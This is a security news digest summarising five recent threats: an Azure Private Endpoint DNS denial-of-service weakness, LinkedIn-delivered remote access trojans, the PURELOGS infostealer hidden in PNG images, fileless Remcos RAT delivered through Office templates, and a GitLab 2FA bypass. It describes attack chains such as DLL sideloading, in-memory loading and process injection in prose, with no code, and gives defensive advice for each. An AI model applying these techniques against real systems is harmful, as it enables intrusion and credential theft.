Azure Private Endpoints Can Create Hidden Denial-of-Service Risk
Palo Alto researchers have identified a design weakness in Azure Private Endpoint deployments that can unintentionally expose cloud resources to denial-of-service conditions. The issue stems from how Azure prioritizes Private DNS zones when a Private Endpoint is created, forcing name resolution through private DNS even for networks that still rely on public access. When multiple virtual networks share or inherit these Private DNS zones, workloads that previously accessed resources through public endpoints can suddenly lose connectivity. This behavior can disrupt access to critical services without changing the affected application itself. The impact is amplified in hybrid or complex network environments where different teams or vendors manage connectivity independently. Analysis suggests a meaningful portion of Azure environments contain at least one configuration where this failure mode is possible. The risk can emerge accidentally through routine security hardening or vendor deployments, but it can also be abused intentionally by attackers with access to Azure configuration controls. By deploying a Private Endpoint in a targeted way, an attacker could disrupt access to storage accounts, Key Vaults, Functions, container registries, or databases, causing cascading application failures. In many environments, loss of access to storage or secrets alone is enough to halt deployments and production workloads. Microsoft acknowledges this as a known architectural limitation, and existing workarounds either weaken the Private Endpoint security model or introduce operational complexity. Organizations should proactively inventory Private DNS zone links, identify networks that resolve private names without corresponding endpoints, and assess which resources still rely on public access. Security and cloud teams should implement continuous configuration reviews, restrict who can create Private Endpoints, monitor DNS resolution failures, and treat Private Link changes as high-risk actions requiring formal change control.
LinkedIn Phishing Campaign Delivers Stealth Remote Access Malware
ReliaQuest researchers have identified a sophisticated phishing campaign abusing LinkedIn private messages to deliver remote access trojans and gain long-term control of corporate systems. Attackers pose as business contacts and send links to malicious archives disguised as legitimate project documents or product materials, tailored to the recipient’s role to increase credibility. The downloaded archive contains a mix of legitimate and malicious components, including a real PDF reader, a hidden malicious DLL, a portable Python interpreter, and decoy files to reduce suspicion. When the victim opens the file, the trusted PDF reader unintentionally loads the malicious DLL, allowing attacker code to execute within a legitimate process and bypass many endpoint defenses. The malware then establishes persistence by creating a registry run key that ensures it launches every time the user logs in. From there, a weaponized Python script runs entirely in memory, decrypting and launching a remote access trojan without leaving clear traces on disk. This campaign is effective because it exploits blind spots in traditional security models and blends malicious activity with trusted tools and platforms. LinkedIn messages often bypass the inspection and controls applied to corporate email, giving attackers a direct path to high-value targets. By relying on legitimate open-source Python scripts and widely trusted software, the attackers reduce development effort while evading signature-based detection and complicating attribution. LinkedIn's professional context also enables precise targeting of executives, IT staff, and administrators who are more likely to have elevated access. To reduce risk, organizations should treat files received through social media platforms with the same caution as email attachments and reinforce user training around executable archives and unexpected downloads. Security teams should restrict the use of unauthorized Python interpreters, monitor for unusual in-memory script execution, and apply application controls to limit DLL sideloading and the use of untrusted portable tools.
PURELOGS Campaign Abuses Image Files for Stealth Credential Theft
Swiss Post Cybersecurity researchers identified a PURELOGS infostealer campaign that is designed to look routine at every step, making it easier to slip past both users and basic security controls. The attack starts with a phishing email posed as a pharmaceutical invoice, containing a ZIP file with a Windows script (.js) that runs on the endpoint, not in the browser. Once a user opens it, the script quietly launches PowerShell in the background and runs the next stage directly in memory, reducing the telltale files that defenders typically look for. The campaign relies on a multi-step chain in which each component appears common on its own, helping it blend into normal activity. The operator then pulls additional content from a trusted public site, reducing the chance that network monitoring flags the download as suspicious. Overall, this is a “low-noise” delivery approach intended to keep the victim unaware while the attacker sets up the theft phase. The standout technique is that the malware payload is hidden inside what appears to be a standard PNG image, allowing the attacker to move malicious code under the cover of a harmless-looking file type. The image displays normally, but it contains hidden, encoded content appended after the visible image data, and the script knows exactly how to extract it using markers embedded in the file. Instead of saving the extracted content to disk, the attack loads it straight into memory and then launches a loader that checks whether it is running in a security sandbox and stops if it detects analysis. Next, the loader injects the final malware into a legitimate Microsoft process, making the activity appear more trustworthy during quick triage and reducing the likelihood of simple alerting. Once running, PURELOGS focuses on credential and session theft from Chromium-based browsers, pulling saved passwords, cookies, autofill data, and stored payment details, then expands to data from email clients, FTP tools, messaging apps, and a wide set of cryptocurrency wallets and wallet extensions. The malware is offered commercially as a subscription service, which increases operational risk by lowering the barrier for many different threat actors to use the same tooling. Organizations should reinforce user reporting and filtering for invoice-themed phishing, restrict or closely control Windows Script Host and unmanaged PowerShell use, monitor endpoints for unusual script-driven behavior and legitimate processes acting abnormally, and treat “trusted” hosting platforms as potential delivery channels rather than a safety guarantee.
Weaponized Shipping Documents Deliver Fileless Remcos RAT
FortiGuard Labs has identified a stealthy phishing campaign that spreads a fileless version of Remcos RAT by abusing shipping-themed documents to lure victims. The attack begins with emails impersonating Vietnamese shipping companies that encourage recipients to open a Microsoft Word attachment that appears to contain updated logistics or delivery information. When opened, the document silently pulls in a remote template from attacker-controlled infrastructure, using multiple redirection services to obscure the final destination. This automatic behavior triggers a long-known Microsoft Office vulnerability that allows code to run without user interaction, demonstrating how outdated systems remain a reliable entry point for attackers. The infection chain is carefully designed so that each step appears routine, helping the campaign avoid suspicion in organizations that regularly handle shipping or logistics documents. Despite the age of the vulnerability, the campaign shows it remains effective where patching discipline is inconsistent. Once exploitation occurs, the attack progresses through several lightweight stages that never write the final malware to disk. A script downloader launches PowerShell in the background, which then retrieves a malicious module disguised as a legitimate system component, hidden inside an image file. This module creates persistence using scheduled tasks and then injects the Remcos remote access tool directly into memory, disguising it inside a legitimate Windows process. From there, attackers gain long-term control, enabling surveillance, credential theft, file access, and network manipulation without leaving obvious artifacts behind. The compromised system is repeatedly reactivated to ensure continued access, even if the process is interrupted. Organizations should strengthen email filtering for shipping-themed lures, disable automatic remote template loading in Office, prioritize patching long-standing vulnerabilities, and monitor for abnormal scheduled task creation and memory-only malware behavior to reduce exposure to similar attacks.
GitLab Releases Security Fix for Self-Managed 2FA Bypass
GitLab released security fixes for a high-severity flaw that could let an attacker bypass two-factor authentication if they already know a target account’s credential ID. The issue, tracked as CVE-2026-0723, stems from a logic weakness in the authentication flow that can accept forged device responses under certain conditions. In practice, this increases account takeover risk in self-managed GitLab environments, especially when account IDs or related identifiers are exposed through logs, integrations, or user enumeration. GitLab also patched additional high-severity issues that could allow unauthenticated denial-of-service through malformed authentication requests and API authorization validation gaps, plus medium-severity DoS conditions tied to malformed Wiki content and repeated malformed SSH authentication attempts. The concern is amplified by the large number of internet-exposed GitLab instances, which creates a broad target set for opportunistic scanning and exploitation attempts. For most organizations, the business impact centers on identity control and the integrity of the developer pipeline. If GitLab access controls are weakened, attackers can disrupt software delivery, access source code, tamper with projects, and pivot into connected systems. GitLab has shipped patched versions 18.8.2, 18.7.2, and 18.6.4 for CE and EE, and GitLab.com is already patched, so the urgent focus is self-managed deployments. Prioritize upgrades immediately, then review external exposure and restrict unnecessary internet access to GitLab, especially administrative and authentication endpoints. Rotate high-risk credentials and access tokens after patching, and validate that 2FA enforcement and device trust workflows behave as expected. Add monitoring for abnormal login patterns and spikes in failed authentication attempts or malformed requests to catch early probing attempts. If you run GitLab on the internet, treat this as an emergency maintenance item and close the window for bypass and disruption as fast as operationally possible.
